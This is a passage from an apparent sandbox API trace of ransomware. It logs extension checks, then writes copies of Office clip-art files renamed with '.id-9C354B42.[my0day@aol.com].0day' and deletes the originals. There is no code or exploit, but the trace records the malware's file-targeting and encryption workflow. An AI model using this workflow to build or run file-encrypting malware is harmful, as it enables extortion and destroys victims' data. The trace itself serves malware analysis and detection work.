(lpString1=".ppt", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0056.768] lstrlenW (lpString=".zip") returned 4 [0056.768] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.768] lstrlenW (lpString=".rar") returned 4 [0056.768] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString=".bz2") returned 4 [0056.768] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString=".7z") returned 3 [0056.768] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0056.768] lstrlenW (lpString=".dbf") returned 4 [0056.768] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0056.768] lstrlenW (lpString=".1cd") returned 4 [0056.768] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0056.768] lstrlenW (lpString=".jpg") returned 4 [0056.768] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.769] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.769] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0056.770] GetLastError () returned 0x0 [0056.770] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x10c8, lpOverlapped=0x0) returned 1 [0056.771] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x10d0, lpOverlapped=0x0) returned 1 [0056.772] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.772] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.772] SetEndOfFile (hFile=0x240) returned 1 [0056.772] CloseHandle (hObject=0x240) returned 1 [0056.772] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.772] SetEndOfFile (hFile=0x1c4) returned 1 [0056.773] CloseHandle (hObject=0x1c4) returned 1 [0056.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0056.774] lstrlenW (lpString=".doc") returned 4 [0056.774] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString=".docx") returned 5 [0056.774] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.774] lstrlenW (lpString=".pdf") returned 4 [0056.774] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString=".xls") returned 4 [0056.774] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.774] lstrlenW (lpString=".xlsx") returned 5 [0056.774] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.774] lstrlenW (lpString=".ppt") returned 4 [0056.774] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0056.774] lstrlenW (lpString=".zip") returned 4 [0056.774] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.774] lstrlenW (lpString=".rar") returned 4 [0056.774] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString=".bz2") returned 4 [0056.774] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString=".7z") returned 3 [0056.774] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0056.774] lstrlenW (lpString=".dbf") returned 4 [0056.774] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0056.774] lstrlenW (lpString=".1cd") returned 4 [0056.774] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0056.774] lstrlenW (lpString=".jpg") returned 4 [0056.775] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.775] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.775] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0056.775] GetLastError () returned 0x0 [0056.775] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xc9c, lpOverlapped=0x0) returned 1 [0056.777] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xca0, lpOverlapped=0x0) returned 1 [0056.778] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.778] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.778] SetEndOfFile (hFile=0x240) returned 1 [0056.778] CloseHandle (hObject=0x240) returned 1 [0056.778] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.778] SetEndOfFile (hFile=0x1c4) returned 1 [0056.779] CloseHandle (hObject=0x1c4) returned 1 [0056.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0056.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0056.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0056.779] lstrlenW (lpString=".doc") returned 4 [0056.779] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.779] lstrlenW (lpString=".docx") returned 5 [0056.779] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.780] lstrlenW (lpString=".pdf") returned 4 [0056.780] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".xls") returned 4 [0056.780] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.780] lstrlenW (lpString=".xlsx") returned 5 [0056.780] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.780] lstrlenW (lpString=".ppt") returned 4 [0056.780] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0056.780] lstrlenW (lpString=".zip") returned 4 [0056.780] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.780] lstrlenW (lpString=".rar") returned 4 [0056.780] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".bz2") returned 4 [0056.780] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".7z") returned 3 [0056.780] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0056.780] lstrlenW (lpString=".dbf") returned 4 [0056.780] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0056.780] lstrlenW (lpString=".1cd") returned 4 [0056.780] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0056.780] lstrlenW (lpString=".jpg") returned 4 [0056.780] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.781] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.781] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0056.781] GetLastError () returned 0x0 [0056.781] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x12c8, lpOverlapped=0x0) returned 1 [0056.783] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x12d0, lpOverlapped=0x0) returned 1 [0056.784] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.784] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.784] SetEndOfFile (hFile=0x240) returned 1 [0056.784] CloseHandle (hObject=0x240) returned 1 [0056.784] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.784] SetEndOfFile (hFile=0x1c4) returned 1 [0056.785] CloseHandle (hObject=0x1c4) returned 1 [0056.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.785] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0056.786] lstrlenW (lpString=".doc") returned 4 [0056.786] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString=".docx") returned 5 [0056.786] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.786] lstrlenW (lpString=".pdf") returned 4 [0056.786] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString=".xls") returned 4 [0056.786] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.786] lstrlenW (lpString=".xlsx") returned 5 [0056.786] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.786] lstrlenW (lpString=".ppt") returned 4 [0056.786] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0056.786] lstrlenW (lpString=".zip") returned 4 [0056.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.786] lstrlenW (lpString=".rar") returned 4 [0056.786] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString=".bz2") returned 4 [0056.786] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString=".7z") returned 3 [0056.786] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0056.786] lstrlenW (lpString=".dbf") returned 4 [0056.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0056.786] lstrlenW (lpString=".1cd") returned 4 [0056.787] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0056.787] lstrlenW (lpString=".jpg") returned 4 [0056.787] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.787] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.787] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0056.787] GetLastError () returned 0x0 [0056.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1384, lpOverlapped=0x0) returned 1 [0057.085] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1390, lpOverlapped=0x0) returned 1 [0057.106] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.106] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.106] SetEndOfFile (hFile=0x240) returned 1 [0057.106] CloseHandle (hObject=0x240) returned 1 [0057.106] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.106] SetEndOfFile (hFile=0x1c4) returned 1 [0057.122] CloseHandle (hObject=0x1c4) returned 1 [0057.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.123] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0057.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0057.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0057.123] lstrlenW (lpString=".doc") returned 4 [0057.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.123] lstrlenW (lpString=".docx") returned 5 [0057.123] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.123] lstrlenW (lpString=".pdf") returned 4 [0057.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.123] lstrlenW (lpString=".xls") returned 4 [0057.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.123] lstrlenW (lpString=".xlsx") returned 5 [0057.123] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.123] lstrlenW (lpString=".ppt") returned 4 [0057.123] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0057.124] lstrlenW (lpString=".zip") returned 4 [0057.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.124] lstrlenW (lpString=".rar") returned 4 [0057.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.124] lstrlenW (lpString=".bz2") returned 4 [0057.124] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.124] lstrlenW (lpString=".7z") returned 3 [0057.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0057.124] lstrlenW (lpString=".dbf") returned 4 [0057.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0057.124] lstrlenW (lpString=".1cd") returned 4 [0057.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0057.124] lstrlenW (lpString=".jpg") returned 4 [0057.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.124] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.124] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.125] GetLastError () returned 0x0 [0057.125] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x133c, lpOverlapped=0x0) returned 1 [0057.183] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1340, lpOverlapped=0x0) returned 1 [0057.184] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.184] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.184] SetEndOfFile (hFile=0x208) returned 1 [0057.275] CloseHandle (hObject=0x208) returned 1 [0057.275] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.275] SetEndOfFile (hFile=0x1c4) returned 1 [0057.289] CloseHandle (hObject=0x1c4) returned 1 [0057.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.297] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0057.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0057.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0057.304] lstrlenW (lpString=".doc") returned 4 [0057.304] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.304] lstrlenW (lpString=".docx") returned 5 [0057.304] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.311] lstrlenW (lpString=".pdf") returned 4 [0057.311] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.311] lstrlenW (lpString=".xls") returned 4 [0057.311] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.311] lstrlenW (lpString=".xlsx") returned 5 [0057.311] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.311] lstrlenW (lpString=".ppt") returned 4 [0057.311] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0057.311] lstrlenW (lpString=".zip") returned 4 [0057.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.311] lstrlenW (lpString=".rar") returned 4 [0057.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.311] lstrlenW (lpString=".bz2") returned 4 [0057.311] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.311] lstrlenW (lpString=".7z") returned 3 [0057.311] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0057.311] lstrlenW (lpString=".dbf") returned 4 [0057.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0057.311] lstrlenW (lpString=".1cd") returned 4 [0057.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0057.311] lstrlenW (lpString=".jpg") returned 4 [0057.312] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.312] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.312] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.312] GetLastError () returned 0x0 [0057.312] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, 